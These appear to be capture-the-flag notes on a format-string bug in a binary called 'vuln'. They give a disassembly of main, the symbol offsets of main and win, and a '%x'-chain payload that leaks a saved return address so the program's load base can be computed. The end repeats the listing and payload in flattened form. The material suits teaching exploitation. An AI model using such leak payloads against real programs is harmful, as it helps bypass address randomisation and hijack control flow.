# find `main` layout with `objdump -d --disassemble=main vuln`

```assembly
0000000000001400 <main>:
    1400:	f3 0f 1e fa          	endbr64
    1404:	55                   	push   %rbp
    1405:	48 89 e5             	mov    %rsp,%rbp
    1408:	48 8d 35 9a fe ff ff 	lea    -0x166(%rip),%rsi        # 12a9
    140f:	bf 0b 00 00 00       	mov    $0xb,%edi
    1414:	e8 57 fd ff ff       	call   1170
    1419:	48 8b 05 f0 2b 00 00 	mov    0x2bf0(%rip),%rax        # 4010
    1420:	b9 00 00 00 00       	mov    $0x0,%ecx
    1425:	ba 02 00 00 00       	mov    $0x2,%edx
    142a:	be 00 00 00 00       	mov    $0x0,%esi
    142f:	48 89 c7             	mov    %rax,%rdi
    1432:	e8 49 fd ff ff       	call   1180
    1437:	b8 00 00 00 00       	mov    $0x0,%eax
    143c:	e8 86 fe ff ff       	call   12c7
    1441:	b8 00 00 00 00       	mov    $0x0,%eax
    1446:	5d                   	pop    %rbp
    1447:	c3                   	ret
```

Notes on the listing:

- The targets of `call 1170` and `call 1180` are unresolved here (the `@plt` symbol names were lost in the paste); they are most likely PLT stubs. Resolve them with `objdump -d -j .plt.sec vuln` or `objdump -R vuln` before assuming what they do. The first call is made with `%edi = 0xb` and `%rsi` pointing at code at `0x12a9`, the second with `%rdi` loaded from the GOT/data slot at `0x4010` and `%edx = 2` — consistent with a signal-handler and a buffering setup, but confirm from the PLT rather than guessing.
- The addresses are link-time offsets (`0x1400`, not a fixed `0x40xxxx`), so the binary is position-independent: every runtime address is `base + offset`.
- `call 12c7` at `0x143c` is the only call into the binary's own `.text`; its return address is `0x1441` (`main+65`), which is what the leak below recovers.

# find `main` and `win` locations (`objdump -t vuln`)

```
000000000000136a g     F .text	0000000000000096              win
0000000000001400 g     F .text	0000000000000048              main
```

`main` is 0x48 = 72 bytes (0x1400..0x1447, matching the `ret` above); `win` sits at offset `0x136a`.

# find the format-string argument offset that holds the return address into `main` (via gdb)

- Payload: `%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx`. The eighteen `%x` conversions consume the first eighteen variadic arguments (on x86-64 SysV the first five come from registers, the rest are read off the stack); the `%lx` after the dot prints the nineteenth as a full 64-bit value, which is why it is `%lx` rather than `%x` (a plain `%x` would truncate the pointer to 32 bits).
- The value printed after the dot corresponds to `*main+65`, i.e. offset `0x1441` — the instruction immediately following `call 12c7`. It is therefore the saved return address pushed by that call, and it leaks the program's load base: `base = leaked_value - 0x1441`, so `win` is at `base + 0x136a`.
- Caveats: the argument index (19) and the constants `0x1441` / `0x136a` are specific to this build; recompute them if the binary is rebuilt or a different compiler/flags are used. Confirm the leak in gdb with `info symbol <leaked value>`, which should report `main+65`.
: 1400: f3 0f 1e fa endbr64 1404: 55 push %rbp 1405: 48 89 e5 mov %rsp,%rbp 1408: 48 8d 35 9a fe ff ff lea -0x166(%rip),%rsi # 12a9 140f: bf 0b 00 00 00 mov $0xb,%edi 1414: e8 57 fd ff ff call 1170 1419: 48 8b 05 f0 2b 00 00 mov 0x2bf0(%rip),%rax # 4010 1420: b9 00 00 00 00 mov $0x0,%ecx 1425: ba 02 00 00 00 mov $0x2,%edx 142a: be 00 00 00 00 mov $0x0,%esi 142f: 48 89 c7 mov %rax,%rdi 1432: e8 49 fd ff ff call 1180 1437: b8 00 00 00 00 mov $0x0,%eax 143c: e8 86 fe ff ff call 12c7 1441: b8 00 00 00 00 mov $0x0,%eax 1446: 5d pop %rbp 1447: c3 ret ``` # find `main` and `win` locations ``` 000000000000136a g F .text 0000000000000096 win 0000000000001400 g F .text 0000000000000048 main ``` # find buffer offset to read return address into `main` via gdb - %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx - return value $\leftrightarrow$ *main+65 after dot